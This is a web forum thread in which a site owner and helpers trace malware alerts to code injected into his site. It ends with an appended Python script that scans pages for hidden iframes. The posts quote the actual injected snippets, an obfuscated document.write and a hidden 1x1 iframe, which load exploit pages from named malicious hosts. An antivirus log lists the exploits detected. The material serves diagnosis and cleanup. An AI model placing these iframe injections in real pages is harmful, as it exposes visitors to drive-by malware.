Malware attempting to load when visiting my site
notset4life
6-21-07, 10:02 PM
Sometimes, when I load my web site, I look at the status bar and I see
waiting for: http//s99.winmplayer.com/check/n404-3.php
today I saw
http//s99.msiesettings.com/check/n404-3.php
I get a virus alert, and then delete the file. My browser then crashes.
From what I understand it's malware, but I have no idea how this is trying to load...if it's a flaw on my site from a script, or if it's in my own computer. I have anti-spyware programs and don't find anything.
I go back and reload the site, keep refreshing, and it's ok. It seems to occur only on the initial launch of the site. Obviously, my concern is having visitors accuse me of spreading viruses. I don't want to give the site name here (as it will probably end up being googled with this thread). But I can pm anyone who would like to take a look.
Thanks in advance for any help
Splinter
6-21-07, 10:21 PM
Most likely you've downloaded a bug at some stage ... to your local machine. And, it may not be getting picked up by the spyware scanner you're using. Or .. if your scanner was 'free', it may have come pre-formatted (grin).
Try a different spyware scanner or two ... even some of the on-line freebies to get a bit more of an opinion.
Sites do get hacked ... but it's more likely at your end. Try opening a few other sites and watch the status bar for your own peace of mind. If the same behaviour occurs, then that will prove it's local.
But, these days it's imperative to have 'good' spyware scanning software as well as anti-virus and firewall. There are some really good open-source jobs out there now that are worth looking at.
Cheers,
Bob.
Run the scans with the PC in safe mode. That way they don't get a chance to load and you can delete them.
notset4life
6-21-07, 11:13 PM
Thanks for the replies. I guess my concern is that it only tries to load when I visit my own web site - never anywhere else.
I was using PC Spyware Doctor, but I'll switch to something else in the meantime.
Try MS Defender. I've always had good luck with it.
Bob,
It is being generated from your web site, not your computer because I just saw the same msiesettings.com while loading your site.
A quick google search found this -> http://www.aquariumadvice.com/rss.php?p=823661
entrecon
6-21-07, 11:26 PM
Have you checked your code for any reference to these sites?
Splinter
6-21-07, 11:34 PM
Jack ... I think you're referring to the original poster ... notset4life ... not me ????
Cheers,
Bob.
Yep, sorry about that Bob, wasn't paying enough attention at the time. ;)
Splinter
6-22-07, 12:08 AM
notset4life ... I just tried your site cybermidi.com ... and it crashed Firefox on me ... so, something going on there ... that msiesettings reference takes forever to load ... have just started up my spyware and anti-virus scanners to see if your site is propagating anything and if it slipped past my firewall. I didn't get any intrusion detection alert, though.
You should probably check the integrity of whatever third party scripts you have running on your site.
Cheers,
Bob.
This is what NOD32 detected when I went to cybermidi.com:
Time Module Object Name Threat Action User Information
6/21/2007 20:13:39 IMON file http://s99.msiesettings.com/check/n404-3.php JS/TrojanDownloader.Psyme.DH trojan Connection terminated
6/21/2007 20:13:29 AMON file D:\Temporary Internet Files\Content.IE5\G403UKZE\n404-3[1].htm JS/TrojanDownloader.Psyme.DH trojan quarantined - deleted Event occurred on a newly created file. The file was moved to quarantine. You may close this window.
6/21/2007 20:13:09 AMON file D:\Temporary Internet Files\Content.IE5\P6Y8BR82\n404-4[1].htm Win32/Exploit.MS06-006 trojan quarantined - deleted Event occurred on a new file created by the application: C:\Program Files\Internet Explorer\iexplore.exe. The file was moved to quarantine. You may close this window.
6/21/2007 20:12:59 IMON file http://s99.msiesettings.com/check/n404-4.php Win32/Exploit.MS06-006 trojan Connection terminated
6/21/2007 20:12:58 IMON file http://s99.msiesettings.com/check/n404-6.php JS/Exploit.CVE-2006-1359 trojan Connection terminated
notset4life
6-22-07, 12:40 AM
I found this:
document.write("<ifr"+"ame src=http://goo"+"gler"+"ank.info/cou"+"nter width=1 height=1 style=displ"+"ay:none></ifra"+"me>");
In the BOOKMARK US Script I was using. So far, it looks like that was the problem.
That was referenced here: http://www.aquariumadvice.com/rss.php?p=823661 (thanks JJ)
That script was very old.
Can someone confirm that the problem appears to be gone from your end?
Thanks for all the help.
Vin
Splinter
6-22-07, 12:48 AM
yep ... that seems to have done the trick ... at least as far as msiesettings goes. cheers, Bob
I actually had something (somehow, sometime) come in and alter the code of my index page. It added this:
<iframe name="3" src="http://s103.msiesettings.com/check/version.php?t=103" width=1 height=1 style="display:none"></iframe>
Right before the </body> tag.
With all the ASCII codes translated, this caused every visitor to my homepage to also visit:
http://s103.msiesettings.com/check/version.php?t=103
Which is where the malware (some sort of downloader, according to Symantec) lodges itself in your Temporary Internet Files.
I have no idea where it came from or when, but it was definitely not anything I put there myself. I removed the iframe code and redeployed the index page to clear up the problem.
cheers,
Chris
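Both injections described in this thread (the concatenated document.write iframe in the bookmark script, and the 1x1 display:none iframe dropped in before </body>) share the same shape: a hidden frame pointing at a third-party host. The script below is an added example, not code from any poster, showing how a site owner could scan their own page sources for that pattern. It joins split string literals so a tag name like "<ifr"+"ame" becomes visible, then flags any iframe whose size or style hides it, reporting the host it loads. The sample page is constructed here and only reuses the two snippets quoted in the thread plus a benign embed for contrast.

```python
import re
from urllib.parse import urlparse

# Constructed sample input: the two injected fragments quoted in this thread
# and one ordinary visible embed that should not be flagged.
SAMPLE_PAGE = r'''
<html><body>
<p>Welcome to the site</p>
<script>document.write("<ifr"+"ame src=http://goo"+"gler"+"ank.info/cou"+"nter width=1 height=1 style=displ"+"ay:none></ifra"+"me>");</script>
<iframe name="3" src="http://s103.msiesettings.com/check/version.php?t=103" width=1 height=1 style="display:none"></iframe>
<iframe src="https://video.example/embed/123" width="640" height="360"></iframe>
</body></html>
'''

# "abc"+"def" -> "abcdef": undoes the string-splitting trick used to keep the
# literal text "<iframe" out of the file.
JOIN_RE = re.compile(r'(["\'])\s*\+\s*\1')
IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.IGNORECASE)
# name=value with double-quoted, single-quoted or bare values.
ATTR_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')


def deobfuscate(source: str) -> str:
    """Join adjacent string-literal concatenations so split tags reassemble."""
    return JOIN_RE.sub('', source)


def parse_attrs(attr_text: str) -> dict:
    """Return iframe attributes as a lowercase-name dict."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        value = m.group(2) if m.group(2) is not None else (
            m.group(3) if m.group(3) is not None else m.group(4))
        attrs[m.group(1).lower()] = value or ''
    return attrs


def hiding_reasons(attrs: dict) -> list:
    """List the attribute values that make the frame invisible to a visitor."""
    reasons = []
    for dim in ('width', 'height'):
        m = re.match(r'\d+', attrs.get(dim, ''))
        if m and int(m.group()) <= 1:
            reasons.append(f'{dim}={attrs[dim]}')
    style = attrs.get('style', '').replace(' ', '').lower()
    if 'display:none' in style or 'visibility:hidden' in style:
        reasons.append('style hides frame')
    return reasons


def find_hidden_iframes(source: str) -> list:
    """Scan page source (raw and de-obfuscated) for hidden third-party iframes."""
    findings = []
    for m in IFRAME_RE.finditer(deobfuscate(source)):
        attrs = parse_attrs(m.group(1))
        reasons = hiding_reasons(attrs)
        if not reasons:
            continue  # a visible embed; not the pattern we are hunting
        src = attrs.get('src', '')
        findings.append({
            'src': src,
            'host': urlparse(src).hostname or '',
            'reasons': reasons,
            # True when the tag only appears after joining split literals
            'obfuscated': m.group(0) not in source,
        })
    return findings


if __name__ == '__main__':
    for f in find_hidden_iframes(SAMPLE_PAGE):
        flag = ' (string-split obfuscation)' if f['obfuscated'] else ''
        print(f"hidden iframe -> {f['host']}: {', '.join(f['reasons'])}{flag}")
```

Running it over the sample reports the googlerank.info frame (found only after de-obfuscation) and the s103.msiesettings.com frame, and stays silent on the 640x360 video embed. Pointing it at every .html, .php and .js file in a deployment is a cheap way to confirm a cleanup like the ones described above actually removed every copy, and any host it reports that you did not put there yourself is worth treating as the thread treated msiesettings.com.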
vBulletin v3.6.0, Copyright ©2000-2009, Jelsoft Enterprises Ltd.